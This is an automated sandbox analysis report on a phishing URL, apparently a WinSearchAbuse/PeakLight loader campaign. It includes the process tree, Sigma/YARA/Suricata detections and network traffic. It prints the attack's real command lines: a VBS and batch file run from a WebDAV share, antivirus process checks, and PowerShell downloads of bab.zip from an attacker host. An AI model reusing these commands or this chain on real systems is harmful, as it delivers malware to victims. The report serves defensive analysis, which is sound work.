Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://listafrica.org/Receipt.html

Overview

General Information

Sample URL:https://listafrica.org/Receipt.html
Analysis ID:1572478
Infos:

Detection

WinSearchAbuse
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Yara detected WinSearchAbuse
Chrome launches external ms-search protocol handler (WebDAV)
Loading BitLocker PowerShell Module
Opens network shares
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1792,i,9648188583902023499,3647810632220696810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 7132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://listafrica.org/Receipt.html" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5588 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 7608 cmdline: "C:\Windows\System32\WScript.exe" "\\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7664 cmdline: "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Acrobat.exe (PID: 8064 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\IPKGELNTQY.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7500 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 644 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2176 --field-trial-handle=1592,i,7247551929779357345,13199760216339771837,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • timeout.exe (PID: 8084 cmdline: timeout /t 5 REM Wait for PDF to open (adjust timeout as needed) MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • tasklist.exe (PID: 6804 cmdline: tasklist /FI "IMAGENAME eq AvastUI.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • find.exe (PID: 7272 cmdline: find /i "AvastUI.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
      • tasklist.exe (PID: 1252 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • find.exe (PID: 2968 cmdline: find /i "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
      • powershell.exe (PID: 5896 cmdline: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • wscript.exe (PID: 8088 cmdline: "C:\Windows\System32\WScript.exe" "\\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7400 cmdline: "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Acrobat.exe (PID: 7724 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\IPKGELNTQY.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • timeout.exe (PID: 7976 cmdline: timeout /t 5 REM Wait for PDF to open (adjust timeout as needed) MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • tasklist.exe (PID: 3856 cmdline: tasklist /FI "IMAGENAME eq AvastUI.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • find.exe (PID: 3420 cmdline: find /i "AvastUI.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
      • tasklist.exe (PID: 6972 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • find.exe (PID: 6968 cmdline: find /i "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
      • powershell.exe (PID: 3592 cmdline: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 8016 cmdline: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5812 cmdline: powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_211JoeSecurity_WinSearchAbuseYara detected WinSearchAbuseJoe Security

    HTML

    SourceRuleDescriptionAuthorStrings
    0.0.pages.csvJoeSecurity_WinSearchAbuseYara detected WinSearchAbuseJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: PowerShell Web Download
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7664, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 5896, ProcessName: powershell.exe
      Sigma detected: Usage Of Web Request Commands And Cmdlets
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7664, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 5896, ProcessName: powershell.exe
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "\\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "\\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4552, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "\\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.vbs" , ProcessId: 7608, ProcessName: wscript.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c \\portion-bottle-statute-breeding.trycloudflare.com@SSL\DavWWWRoot\new.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7664, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 5896, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5588, ProcessName: svchost.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-10T16:04:47.102637+010020559901A Network Trojan was detected192.168.2.1749726154.216.17.1754843TCP
      2024-12-10T16:04:47.102637+010020559901A Network Trojan was detected192.168.2.1749726154.216.17.1754843TCP
      2024-12-10T16:05:17.441795+010020559901A Network Trojan was detected192.168.2.1749746154.216.17.1754843TCP
      2024-12-10T16:05:17.441795+010020559901A Network Trojan was detected192.168.2.1749746154.216.17.1754843TCP
      2024-12-10T16:05:19.127842+010020559901A Network Trojan was detected192.168.2.1749747154.216.17.1754843TCP
      2024-12-10T16:05:19.127842+010020559901A Network Trojan was detected192.168.2.1749747154.216.17.1754843TCP
      2024-12-10T16:05:34.279961+010020559901A Network Trojan was detected192.168.2.1749756154.216.17.1754843TCP
      2024-12-10T16:05:34.279961+010020559901A Network Trojan was detected192.168.2.1749756154.216.17.1754843TCP
      2024-12-10T16:05:34.746162+010020559901A Network Trojan was detected192.168.2.1749756154.216.17.1754843TCP
      2024-12-10T16:05:34.746162+010020559901A Network Trojan was detected192.168.2.1749756154.216.17.1754843TCP
      2024-12-10T16:05:35.380733+010020559901A Network Trojan was detected192.168.2.1749756154.216.17.1754843TCP
      2024-12-10T16:05:35.380733+010020559901A Network Trojan was detected192.168.2.1749756154.216.17.1754843TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results
      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.17:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.17:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.16.158.187:443 -> 192.168.2.17:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49752 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:49768 version: TLS 1.2

      Software Vulnerabilities

      barindex
      Yara detected WinSearchAbuse
      Source: Yara matchFile source: 0.0.pages.csv, type: HTML
      Source: Yara matchFile source: dropped/chromecache_211, type: DROPPED
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2055990 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Request : 192.168.2.17:49726 -> 154.216.17.175:4843
      Source: Network trafficSuricata IDS: 2055990 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Request : 192.168.2.17:49746 -> 154.216.17.175:4843
      Source: Network trafficSuricata IDS: 2055990 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Request : 192.168.2.17:49747 -> 154.216.17.175:4843
      Source: Network trafficSuricata IDS: 2055990 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Request : 192.168.2.17:49756 -> 154.216.17.175:4843
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 4843
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 4843
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 4843
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 8510
      Source: unknownNetwork traffic detected: HTTP traffic on port 8510 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 4843
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 4843
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 8510
      Source: unknownNetwork traffic detected: HTTP traffic on port 8510 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 8510
      Source: unknownNetwork traffic detected: HTTP traffic on port 8510 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49767
      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.16
      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.16
      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.16
      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.16
      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.16
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
      Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
      Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
      Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Length: 48692427Last-Modified: Fri, 06 Dec 2024 09:44:17 GMTContent-Type: application/x-zip-compressedDate: Tue, 10 Dec 2024 15:05:48 GMTETag: "2d193989039d98b00696c89e57084361-1733478257-48692427"Accept-Ranges: bytesServer: WsgiDAV/4.3.0 Cheroot/9.0.0 Python/3.11.1Data Raw: 50 4b 03 04 14 00 00 00 00 00 89 ad ae 58 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 50 79 74 68 6f 6e 2f 4c 61 75 6e 63 68 65 72 2f 50 4b 03 04 14 00 00 00 08 00 56 76 89 58 6e a0 8c d3 34 34 06 00 18 b1 0b 00 16 00 00 00 50 79 74 68 6f 6e 2f 4c 61 75 6e 63 68 65 72 2f 70 79 2e 65 78 65 ec bd 7b 7c 14 45 b6 00 dc 93 4c c8 00 43 7a c0 89 8c 1a 21 40 d0 68 10 23 03 48 18 d0 f0 98 24 2a 81 09 31 13 10 13 58 17 e2 38 be 22 74 43 5c 09 04 3b b3 d2 16 ed 72 77 61 75 ef d5 bb b0 ea 5d 76 d7 dd c5 15 24 f8 c0 09 c1 3c 14 31 80 8b 28 e8 c6 5d 74 2b 0e 6a 80 18 06 09 e9 ef 9c aa ee c9 24 a0 7b ef f7 bb bf ef f7 fd 71 d1 74 57 57 9d 3a 75 ea d4 a9 f3 a8 aa ee 29 bc 6b a3 90 28 08 82 15 fe 74 5d 10 ea 04 fe 2f 57 f8 d7 ff 1c 16 41 48 19 f9 5a 8a b0 63 e0 7b a3 ea 2c 73 de 1b 75 67 e0 be 15 e9 95 cb 1f be 77 f9 8f 1e 4c ff f1 8f 1e 7a e8 61 29 fd 9e 65 e9 cb e5 87 d2 ef 7b 28 7d f6 bc e2 f4 07 1f 5e ba 6c fc 90 21 83 32 0c 1c 2b 27 4f 9e 33 a1 74 c1 48 f3 ef d1 1b 17 8d 98 c2 ee 65 23 5e 64 f7 bb 47 5c 03 f7 89 47 ca 46 38 d9 fd ee 11 e9 ec be 88 e5 7b 6e 7c 77 64 36 83 5b 38 62 12 c3 b1 70 e4 2c b8 97 1d f1 8d 70 b3 fb 6f 47 f2 fb 5d ec 79 fe 7d 3f 0e 60 3b df d7 27 9f 57 10 e6 58 92 84 ad f9 a9 15 66 5e 9b 90 60 19 6c 49 b9 46 b8 3c 41 10 96 0f 64 79 29 41 b8 38 e0 2f 1b f2 90 5b 98 86 e4 00 a3 8e 79 17 c2 83 19 73 3b 3f 1d 0c 7c ce 5d c7 00 11 36 76 8f dd d8 bf 4d 2d 09 c2 52 96 4a 14 ea fe d3 d6 5b f0 f8 60 c1 75 23 dc b7 0c 16 e8 e5 82 50 f0 46 82 70 a7 f0 fd ff d6 bf 9e d0 77 0c 81 ce 6d 96 ef 01 86 7f e3 a5 65 55 12 dc 7f ec 4c e0 04 61 5f ad 7d 61 d2 05 61 c9 f8 e5 4b 7f 24 fd 48 10 d6 3c 2f f0 be bf 00 f7 2b 13 fa c0 e5 c2 ff e3 39 18 e0 81 bf 36 28 b7 c3 7d cf 45 70 e1 f1 cb 57 2c ff 31 a4 79 5f 41 12 b7 c0 fd 9d 4b e0 5b be ec 81 87 01 10 fb 8e 3c 10 5c 70 0f 0e ee 0f 37 53 f8 bf 7f ff a3 7f 75 d1 6f 67 0a 0d fb 63 ff ea 3a fa 3e 97 90 93 ca 89 a8 e6 75 f8 82 82 2e db 75 d9 46 5b 74 f8 57 69 d5 b3 e9 d3 c7 05 41 d9 e7 22 9f 97 35 fc 00 fc af 62 f0 83 3f f9 5e 78 27 83 77 18 55 2a 62 55 c2 58 a5 45 57 f6 a5 85 c2 62 41 7d 7c d5 3e f5 5d ac be b3 17 c5 98 18 8a 1c 13 45 fa 25 50 f4 a3 37 a8 63 dd b3 3d ba 4e 6c 50 5b 69 b1 14 51 75 aa 05 a8 4e e3 f5 38 7c 9d 4d b0 08 74 bb 98 20 6c 15 da 66 0a ee 7d 6a 6d 86 15 b2 94 e9 ad c0 3e c1 5f 2a d6 3e 0e cc d5 bc 76 86 d6 a6 cd ce 70 06 84 1a 50 2f 94 f4 98 74 7d 0e dc 23 1d 80 59 69 d6 43 5d 62 41 47 a8 6b cd 3c 7d 12 62 00 78 bb 8f 2a 1e 6c d8 a6 4d 9b 2c ee 9a 3d cd e6 a3 b7 ce c0 0c 6b 28 2c 39 e7 ae 03 65 6d 11 56 4c 70 87 2b 54 28 0c 75 c9 1f 56 28 ab 33 6c 82 34 18 6a db 7c 7a ea c6 ec 99 02 d9 90 61 07 b0 c5 e5 ee fd f4 bd 62 68 0f 3a 41 3b 41 71 f4 ed 7f 9d cd 01 53 ab 2d a5 4f 7f 20
      Source: global trafficHTTP traffic detected: GET /EBVSA890HBNXVA420/EBVSA890HBNXVA420_pdf.lnk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: kmaybelsrka.sbs:4843
      Source: global trafficHTTP traffic detected: GET /bab.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kinggamminginvoicfin.shop:8510Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /bab.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kinggamminginvoicfin.shop:8510Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /bab.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kinggamminginvoicfin.shop:8510Connection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: listafrica.org
      Source: global trafficDNS traffic detected: DNS query: winaero.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: kmaybelsrka.sbs
      Source: global trafficDNS traffic detected: DNS query: kinggamminginvoicfin.shop
      Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
